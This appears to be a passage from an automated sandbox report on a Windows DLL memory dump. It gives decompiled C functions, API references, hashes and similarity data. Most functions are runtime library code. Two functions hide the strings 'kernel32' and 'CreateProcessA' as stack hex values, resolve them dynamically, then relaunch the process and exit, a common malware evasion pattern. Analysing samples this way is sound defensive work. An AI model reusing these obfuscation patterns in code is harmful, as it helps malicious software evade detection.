										asm("int3");
										__imp__InterlockedFlushSList(_v40, _t98, _t93);
										__eflags = _t64;
										if(_t64 != 0) {
											_push(_t93);
											do {
												_t95 =  *_t64;
												E6F31E93F(_t64);
												_t64 = _t95;
												__eflags = _t95;
											} while (_t95 != 0);
											return _t64;
										}
										return _t64;
									} else {
										goto L8;
									}
								}
							}
							goto L29;
							L8:
							_t90 = _t73;
						} while (_t73 != 0xfffffffe);
						if(_t77 != 0) {
							goto L14;
						}
						goto L15;
					}
				}
				L29:
			}

APIs

_ValidateLocalCookies.LIBCMT ref: 6F31D3FB
___except_validate_context_record.LIBVCRUNTIME ref: 6F31D403
_ValidateLocalCookies.LIBCMT ref: 6F31D491
__IsNonwritableInCurrentImage.LIBCMT ref: 6F31D4BC
_ValidateLocalCookies.LIBCMT ref: 6F31D511

Strings

csm, xrefs: 6F31D4A6

Memory Dump Source

Source File: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 7a2f4353a26e4d2891157bfa4f9899e67368188e929fa9b80fa4cd5facc1f2d3
Instruction ID: 563386b0bb7b2424c7243a247b09eb5dc6d4d35707fa8eec393e0e4801ab1b75
Opcode Fuzzy Hash: 7a2f4353a26e4d2891157bfa4f9899e67368188e929fa9b80fa4cd5facc1f2d3
Instruction Fuzzy Hash: DB41AC74D08219ABCF08DF68C84469EBBB6BF47328F108156D8555B391DF36F925CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F320262, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F320262(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x6f35e350 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x6f328ce8 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E6F31FE77(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E6F31FE77(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

Strings

api-ms-, xrefs: 6F3202B9
ext-ms-, xrefs: 6F3202CD

Memory Dump Source

Source File: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: f92dd318ff28e2842fa96d7a19931fb72e1ff01edd9a1d1b85d7e1911c634a9d
Instruction ID: e33a20830f7744555e2560a976f90a5e4d83833e3ff640c494c1f942ed1f48e0
Opcode Fuzzy Hash: f92dd318ff28e2842fa96d7a19931fb72e1ff01edd9a1d1b85d7e1911c634a9d
Instruction Fuzzy Hash: F7215EB1A89324BBDB114A348D90A4E7BECAF06770F202217ED54A7281DB31FD0485F0

Uniqueness

Uniqueness Score: -1.00%

Function 6F3011A4, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 69
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E6F3011A4() {
				void* _v3;
				_Unknown_base(*)()* _v8;
				_Unknown_base(*)()* _v12;
				char _v13;
				short _v15;
				intOrPtr _v19;
				intOrPtr _v23;
				char _v27;
				char _v28;
				char _v29;
				short _v31;
				intOrPtr _v35;
				intOrPtr _v39;
				char _v43;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v68;
				char _v136;
				intOrPtr* _t29;
				struct HINSTANCE__* _t33;
				struct HINSTANCE__* _t35;
				void* _t37;
				signed int* _t40;
				signed int _t48;
				signed int _t54;

				_v52 = 0x6e72656b;
				_v48 = 0x32336c65;
				asm("aam 0x65");
				asm("insb");
				_t54 = _t48 ^  *_t40;
				_v44 = 0;
				_v43 = 0x43746547;
				if(_t54 != 0) {
					_v39 = 0x616d6d6f;
					_v35 = 0x694c646e;
					_v31 = 0x656e;
					_v29 = 0x41;
					_v28 = 0;
					_v27 = 0x61657243;
					_v23 = 0x72506574;
					_v19 = 0x7365636f;
					_v15 = 0x4173;
					_v13 = 0;
					_v12 = 0;
					_v8 = 0;
				}
				asm("cld");
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				E6F31C640(_t29);
				E6F301426( &_v136, 0, 0x44);
				E6F301426( &_v68, 0, 0x10);
				_t19 =  &_v52; // 0x6e72656b
				_t33 = GetModuleHandleA(_t19);
				_t20 =  &_v43; // 0x43746547
				_v12 = GetProcAddress(_t33, _t20);
				_t35 = _t33;
				_t22 =  &_v27; // 0x61657243
				_v8 = GetProcAddress(_t35, _t22);
				_t37 = _v12();
				_push( &_v68);
				_push( &_v136);
				_push(0);
				_push(0);
				_push(0);
				_push(1);
				_push(0);
				_push(0);
				_push(_t37);
				_push(0);
				if(_v8() != 0) {
					 *0x6f346060 = _v68;
					E6F31C650();
				}
				E6F31C630();
				L7:
				goto L7;
			}

0x6f3011ad
0x6f3011b4
0x6f3011b6
0x6f3011b8
0x6f3011b9
0x6f3011bb
0x6f3011bf
0x6f3011c3
0x6f3011c6
0x6f3011cd
0x6f3011d4
0x6f3011da
0x6f3011de
0x6f3011e2
0x6f3011e9
0x6f3011f0
0x6f3011f7
0x6f3011fd
0x6f301201
0x6f301208
0x6f301208
0x6f30120a
0x6f30120b
0x6f30120d
0x6f30120f
0x6f30121f
0x6f30122f
0x6f301237
0x6f30123b
0x6f301242
0x6f30124d
0x6f301250
0x6f301251
0x6f30125c
0x6f30125f
0x6f301265
0x6f30126c
0x6f30126d
0x6f30126f
0x6f301271
0x6f301273
0x6f301275
0x6f301277
0x6f301279
0x6f30127a
0x6f301281
0x6f301286
0x6f30128b
0x6f30128b
0x6f301290
0x6f301295
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6F30123B
GetProcAddress.KERNEL32(00000000,GetCommandLineCreateProcessA), ref: 6F301247
GetProcAddress.KERNEL32(?,CreateProcessA), ref: 6F301256

Part of subcall function 6F31C650: ExitProcess.KERNEL32 ref: 6F31C657

Strings

sA, xrefs: 6F3011F7
kernel32, xrefs: 6F301237, 6F30123A
GetCommandLineCreateProcessA, xrefs: 6F301242, 6F301245

Memory Dump Source

Source File: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ExitHandleModuleProcess
String ID: GetCommandLineCreateProcessA$kernel32$sA
API String ID: 1008726298-1906453927
Opcode ID: f9af32e7ed38e218cfd99393ced65bac7dde74a99d19c939244c511f3d1c6ea7
Instruction ID: d87e739da1d73efbff35f0a07451fab5f7c5ed0d1cb6c99f6cadec64fc02d715
Opcode Fuzzy Hash: f9af32e7ed38e218cfd99393ced65bac7dde74a99d19c939244c511f3d1c6ea7
Instruction Fuzzy Hash: 532146B1D44309EAEB10EFE4C945BEEBB79AF44B04F108549E640BA284DBB45644CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 6F301167, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 67
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6F301167() {
				intOrPtr* _t25;
				struct HINSTANCE__* _t29;
				struct HINSTANCE__* _t31;
				void* _t33;
				void* _t43;
				void* _t44;
				void* _t48;

				if(_t48 != 0) {
					 *((intOrPtr*)(_t43 - 0x23)) = 0x616d6d6f;
					 *((intOrPtr*)(_t43 - 0x1f)) = 0x694c646e;
					 *((short*)(_t43 - 0x1b)) = 0x656e;
					 *((char*)(_t43 - 0x19)) = 0x41;
					 *((char*)(_t43 - 0x18)) = 0;
					 *((intOrPtr*)(_t43 - 0x17)) = 0x61657243;
					 *((intOrPtr*)(_t43 - 0x13)) = 0x72506574;
					 *((intOrPtr*)(_t43 - 0xf)) = 0x7365636f;
					 *((short*)(_t43 - 0xb)) = 0x4173;
					 *((char*)(_t43 - 9)) = 0;
					 *((intOrPtr*)(_t43 - 8)) = 0;
					 *((intOrPtr*)(_t43 - 4)) = 0;
				}
				_t44 = _t43 + 1;
				asm("cld");
				 *_t25 =  *_t25 + _t25;
				 *_t25 =  *_t25 + _t25;
				E6F31C640(_t25);
				E6F301426(_t44 - 0x84, 0, 0x44);
				E6F301426(_t44 - 0x40, 0, 0x10);
				_t15 = _t44 - 0x30; // 0x6e72656b
				_t29 = GetModuleHandleA(_t15);
				_t16 = _t44 - 0x27; // 0x43746547
				 *((intOrPtr*)(_t44 - 8)) = GetProcAddress(_t29, _t16);
				_t31 = _t29;
				_t18 = _t44 - 0x17; // 0x61657243
				 *((intOrPtr*)(_t44 - 4)) = GetProcAddress(_t31, _t18);
				_t33 =  *((intOrPtr*)(_t44 - 8))();
				_push(_t44 - 0x40);
				_push(_t44 - 0x84);
				_push(0);
				_push(0);
				_push(0);
				_push(1);
				_push(0);
				_push(0);
				_push(_t33);
				_push(0);
				if( *((intOrPtr*)(_t44 - 4))() != 0) {
					 *0x6f346060 =  *((intOrPtr*)(_t44 - 0x40));
					E6F31C650();
				}
				E6F31C630();
				L6:
				goto L6;
			}

0x6f3011c3
0x6f3011c6
0x6f3011cd
0x6f3011d4
0x6f3011da
0x6f3011de
0x6f3011e2
0x6f3011e9
0x6f3011f0
0x6f3011f7
0x6f3011fd
0x6f301201
0x6f301208
0x6f301208
0x6f301209
0x6f30120a
0x6f30120b
0x6f30120d
0x6f30120f
0x6f30121f
0x6f30122f
0x6f301237
0x6f30123b
0x6f301242
0x6f30124d
0x6f301250
0x6f301251
0x6f30125c
0x6f30125f
0x6f301265
0x6f30126c
0x6f30126d
0x6f30126f
0x6f301271
0x6f301273
0x6f301275
0x6f301277
0x6f301279
0x6f30127a
0x6f301281
0x6f301286
0x6f30128b
0x6f30128b
0x6f301290
0x6f301295
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6F30123B
GetProcAddress.KERNEL32(00000000,GetCommandLineCreateProcessA), ref: 6F301247
GetProcAddress.KERNEL32(?,CreateProcessA), ref: 6F301256

Strings

sA, xrefs: 6F3011F7
kernel32, xrefs: 6F301237, 6F30123A
GetCommandLineCreateProcessA, xrefs: 6F301242, 6F301245

Memory Dump Source

Source File: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: GetCommandLineCreateProcessA$kernel32$sA
API String ID: 667068680-1906453927
Opcode ID: 42bd6cc4f63f6b4610c20310337f15764283c51ee97cc86929142b248f14c589
Instruction ID: 77a4446d7c052d107b18da30e299dc1aa94d0774db17c453d38f2baeb6ca7aee
Opcode Fuzzy Hash: 42bd6cc4f63f6b4610c20310337f15764283c51ee97cc86929142b248f14c589
Instruction Fuzzy Hash: 772159B1D04309EBEF11EFE0CC45BEEBB79AF45B04F10854AE240AA1C5D7B45644CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6F3247A7, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F3247A7(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E6F32476F(_t45, 7);
					E6F32476F(_t45 + 0x1c, 7);
					E6F32476F(_t45 + 0x38, 0xc);
					E6F32476F(_t45 + 0x68, 0xc);
					E6F32476F(_t45 + 0x98, 2);
					E6F31FEFF( *((intOrPtr*)(_t45 + 0xa0)));
					E6F31FEFF( *((intOrPtr*)(_t45 + 0xa4)));
					E6F31FEFF( *((intOrPtr*)(_t45 + 0xa8)));
					E6F32476F(_t45 + 0xb4, 7);
					E6F32476F(_t45 + 0xd0, 7);
					E6F32476F(_t45 + 0xec, 0xc);
					E6F32476F(_t45 + 0x11c, 0xc);
					E6F32476F(_t45 + 0x14c, 2);
					E6F31FEFF( *((intOrPtr*)(_t45 + 0x154)));
					E6F31FEFF( *((intOrPtr*)(_t45 + 0x158)));
					E6F31FEFF( *((intOrPtr*)(_t45 + 0x15c)));
					return E6F31FEFF( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

APIs

Part of subcall function 6F32476F: _free.LIBCMT ref: 6F324794

_free.LIBCMT ref: 6F3247F5

Part of subcall function 6F31FEFF: RtlFreeHeap.NTDLL(00000000,00000000,?,6F324799,?,00000000,?,00000000,?,6F3247C0,?,00000007,?,?,6F324436,?), ref: 6F31FF15
Part of subcall function 6F31FEFF: GetLastError.KERNEL32(?,?,6F324799,?,00000000,?,00000000,?,6F3247C0,?,00000007,?,?,6F324436,?,?), ref: 6F31FF27

_free.LIBCMT ref: 6F324800
_free.LIBCMT ref: 6F32480B
_free.LIBCMT ref: 6F32485F
_free.LIBCMT ref: 6F32486A
_free.LIBCMT ref: 6F324875
_free.LIBCMT ref: 6F324880

Memory Dump Source

Source File: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0779c2e4d56e3e30a940d228595ad2773c700ad36579aa28866cdfec2d56c8f4
Instruction ID: fb74bd41959d981bee1d905a02cf767080abf599167a47211556da31202b9b04
Opcode Fuzzy Hash: 0779c2e4d56e3e30a940d228595ad2773c700ad36579aa28866cdfec2d56c8f4
Instruction Fuzzy Hash: E0118B31944B48EBD620EBB4CD05FCF77DDAF82744F400925B2FAA61D2EB35B50586A0

Uniqueness

Uniqueness Score: -1.00%

Function 6F32312B, Relevance: 9.3, APIs: 6, Instructions: 319
fileCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E6F32312B(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, signed int _a8, long _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				long _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _v92;
				long _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				long _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				signed int _t172;
				signed int _t174;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				long _t235;
				struct _OVERLAPPED* _t243;
				signed int _t246;
				intOrPtr _t249;
				signed int _t252;
				signed int _t253;
				signed int _t255;
				struct _OVERLAPPED* _t256;
				intOrPtr _t258;
				void* _t262;
				long _t263;
				signed char _t264;
				signed int _t265;
				void* _t266;
				void* _t268;
				struct _OVERLAPPED* _t269;
				long _t270;
				signed int _t271;
				long _t275;
				signed int _t278;
				long _t279;
				struct _OVERLAPPED* _t280;
				signed int _t282;
				intOrPtr _t284;
				signed int _t286;
				signed int _t289;
				long _t290;
				long _t291;
				signed int _t292;
				intOrPtr _t293;
				signed int _t294;
				void* _t295;
				void* _t296;

				_t172 =  *0x6f34609c; // 0xdcaf13c8
				_v8 = _t172 ^ _t294;
				_t174 = _a8;
				_t263 = _a12;
				_t282 = (_t174 & 0x0000003f) * 0x38;
				_t246 = _t174 >> 6;
				_v112 = _t263;
				_v84 = _t246;
				_v80 = _t282;
				_t284 = _a16 + _t263;
				_v116 =  *((intOrPtr*)(_t282 +  *((intOrPtr*)(0x6f35e428 + _t246 * 4)) + 0x18));
				_v104 = _t284;
				_t178 = GetConsoleCP();
				_t243 = 0;
				_v124 = _t178;
				E6F31EA98( &_v72, _t263, 0);
				asm("stosd");
				_t249 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t249;
				asm("stosd");
				asm("stosd");
				_t275 = _v112;
				_v40 = _t275;
				if(_t275 >= _t284) {
					L52:
					__eflags = _v60 - _t243;
				} else {
					_t286 = _v92;
					while(1) {
						_v47 =  *_t275;
						_v76 = _t243;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0x6f35e428 + _v84 * 4));
						_v52 = _t186;
						if(_t249 != 0xfde9) {
							goto L23;
						}
						_t265 = _v80;
						_t212 = _t186 + 0x2e + _t265;
						_t256 = _t243;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t256)) != _t243) {
							_t256 =  &(_t256->Internal);
							if(_t256 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t278 = _v104 - _t213;
						_v44 = _t256;
						if(_t256 <= 0) {
							_t258 =  *((char*)(( *_t213 & 0x000000ff) + 0x6f3467f0)) + 1;
							_v52 = _t258;
							__eflags = _t258 - _t278;
							if(_t258 > _t278) {
								__eflags = _t278;
								if(_t278 <= 0) {
									goto L44;
								} else {
									_t290 = _v40;
									do {
										_t266 = _t265 + _t243;
										_t216 =  *((intOrPtr*)(_t243 + _t290));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t266 +  *((intOrPtr*)(0x6f35e428 + _v84 * 4)) + 0x2e)) = _t216;
										_t265 = _v80;
										__eflags = _t243 - _t278;
									} while (_t243 < _t278);
									goto L43;
								}
							} else {
								_t279 = _v40;
								__eflags = _t258 - 4;
								_v144 = _t243;
								_t260 =  &_v144;
								_v140 = _t243;
								_v56 = _t279;
								_t219 = (0 | _t258 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t265 + _v52 + 0x2e) & 0x000000ff) + 0x6f3467f0)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t256;
							_v52 = _t229;
							if(_t229 > _t278) {
								__eflags = _t278;
								if(_t278 > 0) {
									_t291 = _v40;
									do {
										_t268 = _t265 + _t243 + _t256;
										_t231 =  *((intOrPtr*)(_t243 + _t291));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t268 +  *((intOrPtr*)(0x6f35e428 + _v84 * 4)) + 0x2e)) = _t231;
										_t256 = _v44;
										_t265 = _v80;
										__eflags = _t243 - _t278;
									} while (_t243 < _t278);
									L43:
									_t286 = _v92;
								}
								L44:
								_t289 = _t286 + _t278;
								__eflags = _t289;
								L45:
								__eflags = _v60;
								_v92 = _t289;
							} else {
								_t269 = _t243;
								if(_t256 > 0) {
									_t293 = _v108;
									do {
										 *((char*)(_t294 + _t269 - 0xc)) =  *((intOrPtr*)(_t293 + _t269));
										_t269 =  &(_t269->Internal);
									} while (_t269 < _t256);
									_t229 = _v52;
								}
								_t279 = _v40;
								if(_t229 > 0) {
									E6F31DD40( &_v16 + _t256, _t279, _v52);
									_t256 = _v44;
									_t295 = _t295 + 0xc;
								}
								if(_t256 > 0) {
									_t270 = _v44;
									_t280 = _t243;
									_t292 = _v80;
									do {
										_t262 = _t292 + _t280;
										_t280 =  &(_t280->Internal);
										 *(_t262 +  *((intOrPtr*)(0x6f35e428 + _v84 * 4)) + 0x2e) = _t243;
									} while (_t280 < _t270);
									_t279 = _v40;
								}
								_v136 = _t243;
								_v120 =  &_v16;
								_t260 =  &_v136;
								_v132 = _t243;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E6F324104(_t260);
								_t296 = _t295 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t275 = _t279 + _v52 - 1;
									L31:
									_t275 = _t275 + 1;
									_v40 = _t275;
									_t193 = E6F3227A9(_v124, _t243,  &_v76, _v44,  &_v32, 5, _t243, _t243);
									_t295 = _t296 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t243) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t286 = _v88 - _v112 + _t275;
											_v92 = _t286;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t275 >= _v104) {
														goto L52;
													} else {
														_t249 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t243) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t286 = _t286 + 1;
															_v92 = _t286;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t252 = _v80;
						_t264 =  *((intOrPtr*)(_t252 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t275;
							_t188 = E6F322E16(_t264);
							_t253 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t253 * 2)) - _t243;
							if( *((intOrPtr*)(_t188 + _t253 * 2)) >= _t243) {
								_push(1);
								_push(_t275);
								goto L30;
							} else {
								_t202 = _t275 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t271 = _v84;
									_t255 = _v80;
									 *((char*)(_t255 +  *((intOrPtr*)(0x6f35e428 + _t271 * 4)) + 0x2e)) = _v33;
									 *(_t255 +  *((intOrPtr*)(0x6f35e428 + _t271 * 4)) + 0x2d) =  *(_t255 +  *((intOrPtr*)(0x6f35e428 + _t271 * 4)) + 0x2d) | 0x00000004;
									_t289 = _t286 + 1;
									goto L45;
								} else {
									_t206 = E6F320CDA( &_v76, _t275, 2);
									_t296 = _t295 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L52;
									} else {
										_t275 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_v24 =  *((intOrPtr*)(_t252 + _t186 + 0x2e));
							_v23 =  *_t275;
							_push(2);
							 *(_t252 + _v52 + 0x2d) = _t264 & 0x000000fb;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t190 = E6F320CDA();
							_t296 = _t295 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t294;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E6F31C65E(_v8 ^ _t294);
			}

APIs

GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 6F323173
__fassign.LIBCMT ref: 6F323352
__fassign.LIBCMT ref: 6F32336F
WriteFile.KERNEL32(?,6F3207E3,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6F3233B7
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6F3233F7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6F3234A3

Memory Dump Source

Source File: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 888084885210c14a4dbd7ffe799e3b235d4dc37c16a856e13442a61aac091610
Instruction ID: 46a6529ccc1d6abdb9588dcd5e5faa58c37f0696ffb8056b1e743df6b7e2dcd2
Opcode Fuzzy Hash: 888084885210c14a4dbd7ffe799e3b235d4dc37c16a856e13442a61aac091610
Instruction Fuzzy Hash: 6AD1B975D002589FDF05CFA8C8819EDBBF9BF49324F2401AAE855FB241D731AA42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F31D7C6, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6F31D7C6(void* __ecx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t25;
				void* _t28;

				if( *0x6f3460c0 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E6F31DAD7(__eflags,  *0x6f3460c0);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6F31DB12(__eflags,  *0x6f3460c0, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_push(1);
								_t28 = E6F31FE6C(_t16);
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6F31DB12(__eflags,  *0x6f3460c0, 0);
								} else {
									__eflags = E6F31DB12(__eflags,  *0x6f3460c0, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6F31E93F(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}

APIs

